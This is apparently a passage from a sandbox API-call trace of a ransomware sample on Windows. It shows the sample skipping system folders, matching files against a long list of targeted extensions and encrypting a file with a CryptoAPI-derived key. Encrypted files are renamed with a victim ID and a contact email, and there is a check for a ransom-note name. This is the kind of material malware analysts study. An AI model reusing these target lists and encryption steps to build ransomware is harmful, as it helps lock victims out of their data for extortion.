	[0171.725] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fcefde8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fcefde8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fd16092, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x230, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 1
	[0171.725] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fcefde8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fcefde8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fd16092, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x230, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 0
	[0171.726] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0171.726] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0171.726] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0171.726] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0171.726] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0171.727] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{1e05dd5d-a022-46c5-963c-b20de341170f}", cAlternateFileName="{1E05D~1")) returned 1
	[0171.727] lstrcmpW (lpString1="{1e05dd5d-a022-46c5-963c-b20de341170f}", lpString2="..") returned 1
	[0171.727] lstrcmpW (lpString1="{1e05dd5d-a022-46c5-963c-b20de341170f}", lpString2=".") returned 1
	[0171.727] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0171.727] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0171.727] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="{1e05dd5d-a022-46c5-963c-b20de341170f}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}"
	[0171.728] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}"
	[0171.728] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\"
	[0171.729] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\"
	[0171.729] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*"
	[0171.729] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0171.735] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*") returned 84
	[0171.735] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.735] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*") returned 0x54
	[0171.736] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.736] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="windows") returned 0x0
	[0171.736] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.736] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="boot") returned 0x0
	[0171.736] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.736] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="system volume information") returned 0x0
	[0171.736] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.736] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.737] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="temp") returned 0x0
	[0171.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.737] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="program files") returned 0x0
	[0171.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.737] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.738] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="appdata") returned 0x0
	[0171.738] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.738] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="application data") returned 0x0
	[0171.738] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.738] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="winnt") returned 0x0
	[0171.738] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.738] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="tmp") returned 0x0
	[0171.738] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.739] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="cache") returned 0x0
	[0171.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.739] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.739] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="webcache") returned 0x0
	[0171.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.739] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="inetcache") returned 0x0
	[0171.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.740] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="nvidia") returned 0x0
	[0171.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.740] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="packages") returned 0x0
	[0171.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.740] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="cookies") returned 0x0
	[0171.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.740] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="programdata") returned 0x0
	[0171.741] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0171.741] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa10504bd, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa10504bd, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa10504bd, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x4ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1
	[0171.741] lstrcmpW (lpString1="customizations.xml", lpString2="..") returned 1
	[0171.741] lstrcmpW (lpString1="customizations.xml", lpString2=".") returned 1
	[0171.741] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\"
	[0171.741] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\", lpString2="customizations.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml"
	[0171.741] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml") returned 99
	[0171.741] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.741] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml") returned 0x63
	[0171.742] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.742] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.742] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml"
	[0171.742] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml") returned 99
	[0171.742] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.742] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.742] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0171.743] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.743] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0171.743] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.743] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.743] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0171.744] ReadFile (in: hFile=0x390, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x4ef, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x18a640*=0x4ef, lpOverlapped=0x0) returned 1
	[0171.753] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.753] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcba18) returned 1
	[0171.755] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.756] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0171.756] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.756] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0171.756] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.756] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb8fb0) returned 1
	[0171.756] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.757] CryptEncrypt (in: hKey=0xfb8fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x4ef, dwBufLen=0x4ef | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x4f0) returned 1
	[0171.757] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.757] RtlMoveMemory (in: Destination=0xfde188, Source=0xfdc138, Length=0x4ef | out: Destination=0xfde188) 
	[0171.757] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.757] CryptEncrypt (in: hKey=0xfb8fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfde188*, pdwDataLen=0x18a1ec*=0x4ef, dwBufLen=0x4f0 | out: pbData=0xfde188*, pdwDataLen=0x18a1ec*=0x4f0) returned 1
	[0171.758] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.758] CryptDestroyKey (hKey=0xfb8fb0) returned 1
	[0171.758] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.758] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0171.758] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.759] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0171.759] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.770] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.771] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.771] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
